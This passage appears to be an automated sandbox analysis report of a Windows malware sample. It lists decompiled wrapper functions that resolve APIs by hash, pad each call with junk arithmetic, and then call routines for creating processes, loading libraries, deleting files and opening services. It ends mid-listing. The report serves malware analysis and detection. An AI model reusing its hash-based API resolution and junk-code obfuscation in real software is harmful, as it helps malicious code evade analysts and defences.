                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ManagerOpen
                                          • String ID: <^
                                          • API String ID: 1889721586-3203995635
                                          • Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction ID: d406d96ca1e4ca2a5ce053f8c48229baa50acf6c46116ac46087fabbe791cae1
                                          • Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
                                          • Instruction Fuzzy Hash: E3016D72A00108BFEB14DF95DC4A8DFBFB6EF48310F108088F508A6250D7B65F619B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021C6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021C6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E0021602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E002207A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}












                                          0x0021c6e1
                                          0x0021c6e6
                                          0x0021c6f0
                                          0x0021c6fc
                                          0x0021c703
                                          0x0021c706
                                          0x0021c70d
                                          0x0021c711
                                          0x0021c715
                                          0x0021c71c
                                          0x0021c723
                                          0x0021c72a
                                          0x0021c731
                                          0x0021c738
                                          0x0021c751
                                          0x0021c762
                                          0x0021c768

                                          APIs
                                          • SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 0021C762
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FolderPath
                                          • String ID: /O
                                          • API String ID: 1514166925-1923427199
                                          • Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction ID: 368e049acd3fbf82153a8d53a9143e92210354e00549e693d66a1729611a1674
                                          • Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
                                          • Instruction Fuzzy Hash: AD1133B290122DBBCB25DF95DC498EFBFB8EF04714F108188F90962210D3714B659BE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00211000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42libraryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 82%
                                          			E00211000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E0021602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E002207A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}











                                          0x00211006
                                          0x00211009
                                          0x0021100c
                                          0x00211011
                                          0x00211016
                                          0x0021101d
                                          0x00211026
                                          0x0021102d
                                          0x00211034
                                          0x0021103b
                                          0x00211047
                                          0x0021104f
                                          0x00211057
                                          0x0021105e
                                          0x00211065
                                          0x0021106c
                                          0x00211073
                                          0x00211077
                                          0x0021108b
                                          0x00211096
                                          0x0021109b

                                          APIs
                                          • LoadLibraryW.KERNEL32(0033A3B7), ref: 00211096
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID: [
                                          • API String ID: 1029625771-3431493590
                                          • Opcode ID: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction ID: 542211732888673dd6bd4a999da95d67d8dd94142be1235f0600662faada698f
                                          • Opcode Fuzzy Hash: 9c9d41f3e216c02b3eee0186e3ef491d10086b4a6365e8d72269f8dd80ebe146
                                          • Instruction Fuzzy Hash: 5B015BB6D01708BBDF04DF94C94A5DEBBB1AB54318F108188E41466291D3B19B649B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00214859, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 28COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00214859() {
				signed int _v8;
				signed int _v12;
				void* _t22;

				_v12 = 0xafe2;
				_v12 = _v12 * 0x42;
				_v12 = _v12 + 0xffffdd89;
				_v12 = _v12 ^ 0x002d198d;
				_v8 = 0x5b09;
				_v8 = _v8 | 0xa1ea9544;
				_v8 = _v8 * 0x12;
				_v8 = _v8 ^ 0x6283d9c1;
				E002207A9(0xc44181ea, 0x9164b7cc, _t22, _t22, 0x1a5);
				ExitProcess(0);
			}






                                          0x0021485e
                                          0x0021487a
                                          0x0021487d
                                          0x00214884
                                          0x0021488b
                                          0x00214892
                                          0x0021489d
                                          0x002148a0
                                          0x002148ad
                                          0x002148b7

                                          APIs
                                          • ExitProcess.KERNELBASE(00000000), ref: 002148B7
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID: [
                                          • API String ID: 621844428-1822564810
                                          • Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction ID: f34ee4eb2b485e945288599d497fbdc208df6c84720c6139dbff6cf129befafa
                                          • Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
                                          • Instruction Fuzzy Hash: 8CF017B0A15209FBDB04CFE8DA9699EBFB9EB40301F20818CE444B7290E3B15F509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00224F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 66%
                                          			E00224F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002207A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}







                                          0x00224f80
                                          0x00224f81
                                          0x00224f82
                                          0x00224f86
                                          0x00224f87
                                          0x00224f8c
                                          0x00224fa5
                                          0x00224fa8
                                          0x00224faf
                                          0x00224fb6
                                          0x00224fc7
                                          0x00224fca
                                          0x00224fd7
                                          0x00224fe2
                                          0x00224fe7

                                          APIs
                                          • CloseHandle.KERNELBASE(003E66D8), ref: 00224FE2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandle
                                          • String ID: {#lm
                                          • API String ID: 2962429428-1564096886
                                          • Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction ID: de85189ff0f10b7205e5618a1194342d1679db1f64d43c2e98040568b64fecc1
                                          • Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
                                          • Instruction Fuzzy Hash: 8BF037B081120CFFDB04DFA4D98689EBFBAEB44300F208199E804AB250D3715B509B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022976F, Relevance: 1.6, APIs: 1, Instructions: 63processCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 21%
                                          			E0022976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002207A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}








                                          0x00229772
                                          0x00229773
                                          0x00229778
                                          0x0022977a
                                          0x0022977b
                                          0x0022977e
                                          0x0022977f
                                          0x00229782
                                          0x00229785
                                          0x00229788
                                          0x00229789
                                          0x0022978c
                                          0x0022978f
                                          0x00229790
                                          0x00229791
                                          0x00229794
                                          0x00229797
                                          0x0022979a
                                          0x0022979d
                                          0x002297a0
                                          0x002297a3
                                          0x002297a6
                                          0x002297a7
                                          0x002297a8
                                          0x002297ad
                                          0x002297b7
                                          0x002297c3
                                          0x002297ca
                                          0x002297d1
                                          0x002297d8
                                          0x002297df
                                          0x002297e3
                                          0x002297fc
                                          0x00229816
                                          0x0022981d

                                          APIs
                                          • CreateProcessW.KERNEL32(0021591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,0021591A), ref: 00229816
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateProcess
                                          • String ID:
                                          • API String ID: 963392458-0
                                          • Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction ID: 8af8b585893f82bc15f7c07b0853e93990054816491876dc31458a1a35a57156
                                          • Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
                                          • Instruction Fuzzy Hash: 8111B372911148BBDF199FD6DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B566, Relevance: 1.6, APIs: 1, Instructions: 55fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 31%
                                          			E0021B566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E0021602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002207A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}








                                          0x0021b569
                                          0x0021b56a
                                          0x0021b56d
                                          0x0021b572
                                          0x0021b574
                                          0x0021b577
                                          0x0021b57a
                                          0x0021b57d
                                          0x0021b580
                                          0x0021b583
                                          0x0021b586
                                          0x0021b587
                                          0x0021b58a
                                          0x0021b58d
                                          0x0021b590
                                          0x0021b593
                                          0x0021b594
                                          0x0021b595
                                          0x0021b59a
                                          0x0021b5a4
                                          0x0021b5b8
                                          0x0021b5c0
                                          0x0021b5c4
                                          0x0021b5cb
                                          0x0021b5d2
                                          0x0021b5d9
                                          0x0021b5e6
                                          0x0021b5fd
                                          0x0021b604

                                          APIs
                                          • CreateFileW.KERNELBASE(00220668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00220668,?,?,?,?), ref: 0021B5FD
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction ID: 8c5b0151ff509629f37df0858bbc5671548eea907959aa7da7d1092e1be52d2d
                                          • Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
                                          • Instruction Fuzzy Hash: 4211C372801248BBDF16DF95DD06CEE7FBAFF89314F148198FA1862120D3729A60EB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022981E, Relevance: 1.5, APIs: 1, Instructions: 43memoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 54%
                                          			E0022981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E0021602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002207A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}









                                          0x00229821
                                          0x00229822
                                          0x00229825
                                          0x00229828
                                          0x0022982a
                                          0x0022982c
                                          0x0022982f
                                          0x00229832
                                          0x00229835
                                          0x00229836
                                          0x00229837
                                          0x0022983c
                                          0x00229855
                                          0x00229858
                                          0x0022985f
                                          0x00229866
                                          0x0022986d
                                          0x00229874
                                          0x0022987b
                                          0x0022988e
                                          0x0022989b
                                          0x002298a2

                                          APIs
                                          • RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,002187F2,0000CAAE,0000510C,AD82F196), ref: 0022989B
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction ID: 136ff4b73406eac4840e75f5a7c5c464a2f8124889a7d21b5cd232603915ad96
                                          • Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
                                          • Instruction Fuzzy Hash: C2014876801208BBDB04EFD5D8468DFBFB9EF85750F108199F918A6220E6715A619BA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00227BF4, Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 62%
                                          			E00227BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002207A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}









                                          0x00227bf7
                                          0x00227bf8
                                          0x00227bfa
                                          0x00227bfd
                                          0x00227bff
                                          0x00227c02
                                          0x00227c06
                                          0x00227c07
                                          0x00227c0f
                                          0x00227c1d
                                          0x00227c25
                                          0x00227c2d
                                          0x00227c31
                                          0x00227c38
                                          0x00227c3f
                                          0x00227c46
                                          0x00227c4a
                                          0x00227c5e
                                          0x00227c67
                                          0x00227c6d

                                          APIs
                                          • SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00227C67
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileOperation
                                          • String ID:
                                          • API String ID: 3080627654-0
                                          • Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction ID: 4506c20672cf2cf3caec14a6ca0a9d6c1bf7f964dc28c20fa5fa43f13956cead
                                          • Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
                                          • Instruction Fuzzy Hash: 7E014FB190120CFFEB09DF94D84A8DEBBB5EF44314F108198F40567240E7B15F609B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021F65F, Relevance: 1.5, APIs: 1, Instructions: 40serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 52%
                                          			E0021F65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002207A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}








                                          0x0021f662
                                          0x0021f663
                                          0x0021f665
                                          0x0021f668
                                          0x0021f66a
                                          0x0021f66d
                                          0x0021f670
                                          0x0021f673
                                          0x0021f677
                                          0x0021f678
                                          0x0021f67d
                                          0x0021f687
                                          0x0021f693
                                          0x0021f69a
                                          0x0021f6a1
                                          0x0021f6a5
                                          0x0021f6a9
                                          0x0021f6b0
                                          0x0021f6c9
                                          0x0021f6d8
                                          0x0021f6de

                                          APIs
                                          • OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 0021F6D8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: OpenService
                                          • String ID:
                                          • API String ID: 3098006287-0
                                          • Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction ID: 106e2d8713a64ed87b02e2ca2f7615aa113f59112c714e2c671415f888782640
                                          • Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
                                          • Instruction Fuzzy Hash: 9B01E5B6901208BBEF059F94DC4A8DF7F75EB05324F148188F90462250D6B25E61DBA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0021B6DD, Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0021B6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E0021602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002207A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}








                                          0x0021b6f3
                                          0x0021b6f8
                                          0x0021b702
                                          0x0021b70b
                                          0x0021b712
                                          0x0021b719
                                          0x0021b720
                                          0x0021b727
                                          0x0021b72e
                                          0x0021b747
                                          0x0021b759
                                          0x0021b75e

                                          APIs
                                          • SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 0021B759
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: FileHandleInformation
                                          • String ID:
                                          • API String ID: 3935143524-0
                                          • Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction ID: 82f69c0fac6d70267d21593f0c3ff8349d879125f3defbce7c14a7de5816fdb4
                                          • Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
                                          • Instruction Fuzzy Hash: 150178B2940308FBEB45DF90DD06A9E7BB5EB18704F108188FA09261A0D3B25A20AB61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0022AA3C, Relevance: 1.5, APIs: 1, Instructions: 34fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E0022AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002207A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}







                                          0x0022aa3f
                                          0x0022aa40
                                          0x0022aa41
                                          0x0022aa44
                                          0x0022aa47
                                          0x0022aa4b
                                          0x0022aa4c
                                          0x0022aa51
                                          0x0022aa5b
                                          0x0022aa64
                                          0x0022aa68
                                          0x0022aa6f
                                          0x0022aa76
                                          0x0022aa8d
                                          0x0022aa90
                                          0x0022aa9d
                                          0x0022aaa8
                                          0x0022aaad

                                          APIs
                                          • DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0022AAA8
                                          Memory Dump Source
                                          • Source File: 00000012.00000002.2110998210.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true
                                          • Associated: 00000012.00000002.2110988746.0000000000210000.00000004.00000001.sdmp Download File
                                          • Associated: 00000012.00000002.2111035585.000000000022C000.00000004.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteFile
                                          • String ID:
                                          • API String ID: 4033686569-0
                                          • Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction ID: bda999c00b52578895d364b87efee0fbb129f381efd7f11970989b5c23b94233
                                          • Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
                                          • Instruction Fuzzy Hash: 92F069B191020CFFDF08DF94DD4A89EBFB4EB44304F108088F805A6250D3B69B649B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00215FB2, Relevance: 1.5, APIs: 1, Instructions: 33serviceCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 70%
                                          			E00215FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E0021602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002207A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}







                                          0x00215fb5
                                          0x00215fb6
                                          0x00215fb7
                                          0x00215fbb
                                          0x00215fbc
                                          0x00215fc1
                                          0x00215fcb
                                          0x00215fd7
                                          0x00215fde
